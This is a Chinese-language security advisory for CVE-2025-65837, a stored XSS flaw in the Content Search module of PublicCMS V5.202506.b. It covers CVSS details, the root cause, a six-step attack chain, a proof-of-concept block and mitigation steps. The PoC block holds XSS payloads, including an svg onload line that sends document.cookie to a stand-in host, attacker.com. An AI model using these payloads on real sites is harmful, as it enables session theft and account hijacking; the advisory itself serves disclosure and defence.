CVE-2025-65837 PublicCMS Content Search模块存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-65837

漏洞类型

XSS跨站脚本攻击

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

PublicCMS

漏洞概述

CVE-2025-65837是PublicCMS内容管理系统中的一个中危跨站脚本（XSS）漏洞。该漏洞存在于PublicCMS V5.202506.b版本的Content Search（内容搜索）模块中。攻击者可以通过在搜索功能中注入恶意JavaScript代码，当其他用户访问包含该恶意代码的搜索结果页面时，恶意脚本将在受害者浏览器中执行。这可能导致窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或植入恶意链接等危害。由于该漏洞需要低权限用户操作并涉及用户交互，因此CVSS评分被评定为5.4分（中危）。该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N，表明攻击复杂度低，但需要用户交互才能触发。PublicCMS作为一款开源Java CMS系统，广泛应用于各类网站构建场景，该漏洞的存在对使用该版本系统的用户构成潜在安全风险。

技术细节

该漏洞为存储型XSS漏洞，存在于PublicCMS的内容搜索模块中。漏洞产生的根本原因在于系统对用户输入的搜索关键词缺乏充分的输入验证和输出编码。当攻击者在搜索框中输入包含恶意JavaScript代码的字符串时（如：<script>alert(document.cookie)</script>），系统直接将该内容存储在数据库中并未进行安全过滤。当其他用户访问搜索结果页面时，服务器从数据库读取该恶意内容并直接嵌入到HTML响应中返回给客户端浏览器。由于浏览器将执行页面中的JavaScript代码，恶意脚本便会成功执行。攻击者可以利用此漏洞窃取受害者的认证会话信息、修改页面内容进行钓鱼攻击、或将用户重定向到恶意网站。由于搜索功能是网站的公共模块，攻击者更容易诱导其他用户访问包含恶意代码的搜索结果页面，从而扩大攻击影响范围。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用的PublicCMS版本，确认是否为V5.202506.b或存在Content Search模块的版本

STEP 2

漏洞探测

攻击者访问PublicCMS的搜索功能，输入XSS测试载荷验证漏洞存在性，如<script>alert(1)</script>

STEP 3

恶意代码注入

确认漏洞存在后，攻击者构造包含恶意JavaScript代码的搜索关键词，该代码会被存储在数据库中

STEP 4

等待受害者访问

攻击者等待或诱导其他用户（如管理员）访问包含恶意代码的搜索结果页面

STEP 5

脚本执行

当受害者访问搜索结果页面时，浏览器解析HTML并执行注入的恶意JavaScript代码

STEP 6

数据窃取或进一步攻击

恶意脚本执行后，攻击者可窃取用户Cookie、会话令牌，或进行账户劫持、钓鱼攻击等后续操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-65837 PublicCMS XSS PoC -->
<!-- Inject malicious script via search functionality -->

<!-- Step 1: Inject XSS payload in search box -->
<script>alert(document.domain)</script>
<img src=x onerror=alert(document.cookie)>
<svg/onload=fetch('https://attacker.com/steal?c='+document.cookie)>

<!-- Example: Send search request with XSS payload -->
<!-- GET /search?q=<script>alert(document.cookie)</script> -->

<!-- Step 2: When victim visits search results, XSS executes -->
<!-- The injected script will be rendered in HTML without sanitization -->

<!-- PoC for automated testing -->
const xssPayload = '<script>console.log("XSS Triggered")</script>';
const searchUrl = 'https://target-site.com/search?q=' + encodeURIComponent(xssPayload);
fetch(searchUrl).then(r => r.text()).then(console.log);

<!-- Recommended remediation: Implement input validation and output encoding -->

影响范围

PublicCMS V5.202506.b

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1) 禁用或限制搜索模块的某些高级功能；2) 对搜索输入实施严格的输入长度限制和字符过滤；3) 启用Web应用防火墙（WAF）规则检测和拦截XSS攻击载荷；4) 加强对管理员账户的安全防护，避免攻击者利用XSS获取管理权限；5) 监控搜索功能的异常使用模式，及时发现潜在的攻击行为。建议尽快应用官方发布的安全更新。